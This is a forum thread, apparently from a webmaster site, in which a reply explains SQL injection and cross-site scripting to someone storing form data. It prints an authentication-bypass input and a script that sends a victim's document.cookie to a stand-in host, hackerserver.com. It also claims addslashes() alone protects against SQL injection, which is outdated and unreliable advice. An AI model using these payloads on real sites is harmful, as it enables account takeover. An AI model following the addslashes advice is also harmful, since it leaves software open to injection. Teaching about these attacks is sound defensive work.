When youve got a form and people submit information which gets put into a database what safety precautions need to be taken so that the data isnt dangerous? By this I mean what functions...
There are two things you have to watch out for: SQL injection and then malicious code that will run on the client machine.
SQL injection occurs when you do not addslashes to data you are using in queries. For example, take this query for example:
SELECT * FROM admins WHERE username='$username' AND password='$password'
If you do not addslashes to the user inputted data, they could enter data that will malform the query and get it to return true no matter what (thus, in that example, the user might gain admin accesS)
SELECT * FROM admin WHERE username='[COLOR=Blue][B]root_admin[/B][/COLOR]' AND password='[COLOR=Blue][B]anything' OR 1[/B][/COLOR]
So add_slashes protect against that just fine.
The malicious code occurs when a user inserts some kind of script that will be run on a victims computer. For example, say you have a comments system and you let your members use HTML. Let's also say you authenticate members and store their username /password hash in a cookie. A malicious user could use javascript to get a hold of the username and password hash (where it could be cracked):
Hi guys, I really like your site!
<script type="text/javascript">
window.location='http://hackerserver.com/record_cookie.php?data=' + [COLOR=Blue][B]document.cookie[/B][/COLOR];
</script>
You can either write complex expressions to filter out those kinds of attacks, or simply disable all HTML (which htmlspecialchars does).
So all in all:
addslashes(): Inserting untrusted data into the database
htmlspecialchars(): Displaying untrusted data to users
Python
Forum LeaderThe Royal RAM
Comments
SQL injection occurs when you do not addslashes to data you are using in queries. For example, take this query for example: If you do not addslashes to the user inputted data, they could enter data that will malform the query and get it to return true no matter what (thus, in that example, the user might gain admin accesS) So add_slashes protect against that just fine.
The malicious code occurs when a user inserts some kind of script that will be run on a victims computer. For example, say you have a comments system and you let your members use HTML. Let's also say you authenticate members and store their username /password hash in a cookie. A malicious user could use javascript to get a hold of the username and password hash (where it could be cracked):
You can either write complex expressions to filter out those kinds of attacks, or simply disable all HTML (which htmlspecialchars does).
So all in all:
- addslashes(): Inserting untrusted data into the database
- htmlspecialchars(): Displaying untrusted data to users
They are all you really need.Webmaster-Talk.com
Chroder.com
Its a good job Ive always used them two then
The Royal Ram